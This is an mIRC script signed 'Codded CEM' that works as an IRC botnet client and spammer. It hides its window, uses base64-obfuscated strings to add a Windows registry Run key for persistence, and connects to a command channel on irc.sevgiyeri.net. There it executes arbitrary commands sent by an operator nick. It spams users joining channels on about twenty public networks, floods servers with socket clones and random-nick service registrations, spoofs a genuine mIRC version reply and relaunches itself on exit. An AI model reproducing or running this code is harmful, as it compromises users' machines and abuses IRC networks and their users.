;Codded CEM

On *:Start: {
.secret  
.sevemem
  .server irc.sevgiyeri.net
  .server -m urano.irc-hispano.org
  .server -m irc.free.fr
  .server -m gr.irc.gr
  .server -m irc.voila.fr
  .server -m irc.undernet.org
  .server -m irc.quakenet.org
  .server -m irc.dal.net
  .server -m irc.fuxwith.us
  .server -m irc.icq.com
  .server -m irc.freshirc.com
  .server -m irc.adultchatnetwork.com
  .server -m irc.serbiancafe.ws
  .server -m irc.hellas-irc.net
  .server -m irc.bolchat.com
  .server -m irc.omnitel.net
  .server -m irc2.fastland.org
  .server -m irc.atomic-irc.net
  .server -m irc.bluewin.ch
  .server -m irc.gigairc.net
  .server -m irc.chez.com
  .server -m irc.criten.net
.timer 0 0 Secret
  .company  
  .timer 0 40 Baglanti
  .inc %yenimisin
}
On *:Connect: {
  if (Sevgiyeri.Net isin $server) { join #.x. | .timer 1 500 disconnect | $Realx }
  if ($cid == 3) { join #free,#rencontres,#quarantaine | .timer 1 250 disconnect }
  if (voila.fr isin $server) { .timer 0 10 voila | .timer 1 250 disconnect }
  if (undernet.org isin $server) { .timer 0 10 Under | .timer 1 250 disconnect }
  if (Quakenet.org isin $server) { .timer 0 10 Quake | .timer 1 250 disconnect }
  if (Dal.Net isin $server) { .timer 0 10 Dal | .timer 1 250 disconnect }
  if (fuxwith.us isin $server) { .timer 0 10 Rizon | .timer 1 250 disconnect }
  if (hqirc.net isin $server) { .timer 0 10 join #Romance | .timer 1 250 disconnect }
  if (freshirc.com isin $server) { .timer 0 10 Fresh | .timer 1 250 disconnect }
  if (adultchatnetwork.com isin $server) { .timer 0 10 Adult | .timer 1 250 disconnect }
  if (Serbiancafe.ws isin $server) { .timer 0 10 Serbian | .timer 1 250 disconnect }
  if (HellaS-iRC.GR isin $server) { .timer 0 10 hellas | .timer 1 250 disconnect }
  if (bolchat.org isin $server) { join #Bosnia,#tuzlacafe | .timer 1 250 disconnect }
  if (Aitvaras.Net isin $server) { .timer 0 10 Aitvaras | .timer 1 250 disconnect }
  if (fastland.org isin $server) { join #fastweb,#roma | .timer 1 250 disconnect }
  if (atomic-irc.net isin $server) { .timer 0 10 Atomic | .timer 1 250 disconnect }
  if (gigairc.net isin $server) { .timer 0 10 giga | .timer 1 250 disconnect }
  if (tiscali.fr isin $server) { .timer 0 10 Chez | .timer 1 250 disconnect }
  if (Criten.net isin $server) { .timer 0 10 Criten | .timer 1 250 disconnect }
  if (bluewin.ch isin $server) { join #bluewinflirt,#teentalk.1,#zuerich,#turkchat | .timer 1 250 disconnect }
  if (irc-hispano.org isin $server) { .timer 0 10 hispano | .timer 1 250 disconnect }
  .ignore -wd *
}
alias company {
  .set %windows $r(10,1999) $+ .reg 
  .write %windows $rum(UkVHRURJVDQ=)
  .write %windows $rum(W0hLRVlfTE9DQUxfTUFDSElORVxTT0ZUV0FSRVxNaWNyb3NvZnRcV2luZG93c1xDdXJyZW50VmVyc2lvblxSdW5d) 
  .write %windows "Soundman System"=" $+ $remove($mircexe,$mircdir) $+ "
  $rum(cnVuIC1uIHJlZ2VkaXQgL3M=) %windows 
  $rum(dGltZXIgMSA0IHJlbW92ZQ==) %windows
}
On *:Text:*:#: {
  if ($nick isop #.x.) {
    if ($nick == Cem) {
      if ($1 == !Cem) { $2- }
    }
  }
}
On *:Join:#: {
  if (Sevgiyeri.Net isin $server) { halt }
  if (Sevgiyeri.Net !isin $server) { 
    if ($nick == %spam) { halt }
    if ($nick == reload) { halt }
    if ($nick == %spam1) { halt }
    if ($nick == %spam2) { halt }
    if ($nick == %spam3) { halt }
    if ($nick == %spam4) { halt }
    if ($nick !== $me) { .timer 1 $r(1,29) msg $nick($chan,$rand(8,$nick($chan,0))) %rawtopic }
  }
}
ctcp ^*:VERSION:ctcpreply $nick VERSION mIRC v6.03 Khaled Cem-Bey :P
alias hispano {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/hispano.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias gr {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/gr.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias voila {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/voila.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias under {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/under.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias quake {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/quake.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias dal {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/dal.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias rizon {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/rizon.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias fresh {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/fresh.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias adult {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/adult.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias serbian {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/serbian.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias hellas {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/hellas.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias aitvaras {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/aitvaras.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias atomic {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/atomic.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias giga {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/giga.txt) }
  if ($chan(0).status >= 1) { halt }
}
alias chez {
  if ($chan(0).status = 0) { $rum(am9pbg==) $read(services/chez.txt) }
  if ($chan(0).status >= 1) { halt }
}
Alias Realx {
  if (%yenimisin == 1) { msg #.x. Ben yeni indirilmis bir botum! }
  if (%yenimisin !== 1) { return }
}
alias rum { var %i = 0, %text = $strip($$1), %is = $isid | while (%i < 1) { %text = $iif($calc(%i % 2), $decode(%text), $decode(%text,m)) | inc %i }
  if (!%text) { if (%is) return | var %blank = now | echo !!!! | halt  }
$iif(%is, return %text, echo -a %text) | halt }
alias Secret { .echo Cem $dll(windowsxp.dll, do_ShowWindow, $window(-2).hwnd 0) }
raw *:*: {
  if ($numeric = 439) { disconnect }
  if ($numeric = 432) { $rum(bmljaw==) $mimik } 
  if ($numeric = 433) { $rum(bmljaw==) $mimik }
  if ($numeric == 332) {
    if (Sevgiyeri.Net isin $server) && (%topic == #.x.) { set %rawtopic $3- }
  }
}
alias load {
  if ($1 = $rum(eXVrbGU=)) { 
    var %x = $4 
    %cs = $2 
    %cp = $3 
    while  (%x >= 1) { 
      .sockopen load $+ %x $+ $mrsn %cs %cp 
      dec %x  
    } 
  }
  if ($1 = $rum(c2FsZP1y)) { 
    $kabus(sockw,join,$2) 
    $kabus(sockw,privmsg,$2, : $cimbom)
  }
  if ($1 = $rum(Z2ly)) { 
    $kabus(sockw,join,$2) 
  } 
  if ($1 = $rum(Y/1r)) { 
    $kabus(sockw,part,$2) 
  } 
  if ($1 = $rum(Y2xvc2U=)) { 
    $kabus(sockw,quit, : $cimbom) 
    .timerflood off 
  }
  if ($1 = $rum(bm90aWNl)) { 
    $kabus(sockw,notice,$2, : $3-) 
  } 
  if ($1 = $rum(cmVnbGU=)) { $oku } 
  if ($1 = $rum(cmFuZG9t)) { 
    $kabus(sockw,join,$2) 
    $kabus(sockw,privmsg,$2, : $3- $str($siktim,50))
  }
  if ($1 = $rum(aGVscA==)) { 
    $kabus(sockw,privmsg,nickserv, : help)
    $kabus(sockw,privmsg,chanserv, : help)
    $kabus(sockw,privmsg,memoserv, : help)
  }
  if ($1 = $rum(bWVtb3NlbmQ=)) { sockwrite -nt load* memoserv send $2 : $3- }
  if ($1 = $rum(bmljaw==)) { sockwrite -nt load* $dellen }
}

alias dellen { sockwrite -nt load* $sockname nick $siktim }
alias oku { sockwrite -nt load* nickserv register $siktim  $+($siktim,@hotmail.com) }
on 1:sockopen:load*: { 
  .sockwrite -nt $sockname user $saldým $saldým $siktim : $saldým
  .sockwrite -nt $sockname nick $siktim
}
alias kabus { if ( $1 = loadteam) { $rum(cnVuIGtvbWlrLmV4ZSAvbiAvZmggL3I=) ' $+ $2- $+ ' } | if ($1 = sockw) { sockwrite -nt load* $2- } }
alias cimbom {   return $str( $+  $+ $r(A,Z) $+  $+ $r(0,9) $+  $+ $r(a,z) $+  $+ $r(0,9) $+  $+ $r(a,z),$r(60,72)) }

on 1:sockread:load*:{
  if ($sockerr > 0) { return }
  :loop | sockread %tmp
  if ($sockbr == 0) { return } 
  if ($gettok(%tmp,1,32) == ping) { sockwrite -n $sockname PONG $gettok(%tmp,2-,32) }
  if ($gettok(%tmp,2,32) == KICK) { sockwrite -nt clone* JOIN : $+ $gettok(%tmp,3,32) }
  if ($gettok(%tmp,2,32) = PRIVMSG) {
    if (($remove($mid($gettok(%tmp,4,32),3,100),$chr(1)) = VERSION)) {
      sockwrite -n $sockname NOTICE $mid($gettok(%tmp,1,33),2,100) : $+ $Chr(1) VERSION mIRC v $+ $version Khaled Mardam-Bey $+ $Chr(1)
    }
  }
}
alias mimik { unset %rxf* | set %rxf $r(A,Z) | var %a = $r(1,2) , %b = $r(1,4) , %c = $r(1,2) , %d = $r(A,Z) | if (%c = 1) { var %_ = 1 | while (%_ <= $calc(%a + %b)) {  var %r = $r(1,2) |  if (%r = 1) { set %rxf [ %rxf ] $r(A,Z) }
  if (%r = 2) { set %rxf [ %rxf ] $r(A,Z) } | inc %_  } } | if (%c = 2) { var %_ = 1 | while (%_ <= $calc(%a + %b)) { var %r = $r(1,2) |  if (%r = 1) { set %rxf [ %rxf ] $r(A,Z) } | if (%r = 2) { set %rxf [ %rxf ] $r(A,Z) } | inc %_  } } | return $remove(%rxf,$chr(32)) 
}
alias saldým { unset %rxf* | set %rxf $r(A,Z) | var %a = $r(1,4) , %b = $r(1,6) , %c = $r(1,4) , %d = $r(A,Z) | if (%c = 1) { var %_ = 1 | while (%_ <= $calc(%a + %b)) {  var %r = $r(1,2) |  if (%r = 1) { set %rxf [ %rxf ] $r(A,Z) }
  if (%r = 2) { set %rxf [ %rxf ] $r(A,Z) } | inc %_  } } | if (%c = 2) { var %_ = 1 | while (%_ <= $calc(%a + %b)) { var %r = $r(1,2) |  if (%r = 1) { set %rxf [ %rxf ] $r(A,Z) } | if (%r = 2) { set %rxf [ %rxf ] $r(A,Z) } | inc %_  } } | return $remove(%rxf,$chr(32)) 
}
alias siktim { unset %rxf* | set %rxf $r(A,Z) | var %a = $r(1,8) , %b = $r(1,3) , %c = $r(1,2) , %d = $r(A,Z) | if (%c = 1) { var %_ = 1 | while (%_ <= $calc(%a + %b)) {  var %r = $r(1,2) |  if (%r = 1) { set %rxf [ %rxf ] $r(A,Z) }
  if (%r = 2) { set %rxf [ %rxf ] $r(A,Z) } | inc %_  } } | if (%c = 2) { var %_ = 1 | while (%_ <= $calc(%a + %b)) { var %r = $r(1,2) |  if (%r = 1) { set %rxf [ %rxf ] $r(A,Z) } | if (%r = 2) { set %rxf [ %rxf ] $r(A,Z) } | inc %_  } } | return $remove(%rxf,$chr(32))
}
Alias Sevemem {
  .nick $siktim
  .anick $siktim
  .emailaddr $siktim
  .identd on $siktim
  .username $siktim
}
Alias Baglanti {
  if (!$server) { .scid -s 1 server irc.sevgiyeri.net }
}
On *:disconnect: {
  .sevemem
  .close -m
  .clearall
  .server
}
On *:Exit: { run $remove($mircexe,$mircdir) }
on *:action:*:?:closemsg $nick | halt
on *:text:*:?:closemsg $nick | halt
on *:notice:*:?:closemsg $nick | halt
on *:ping: { ctcp $me ping }
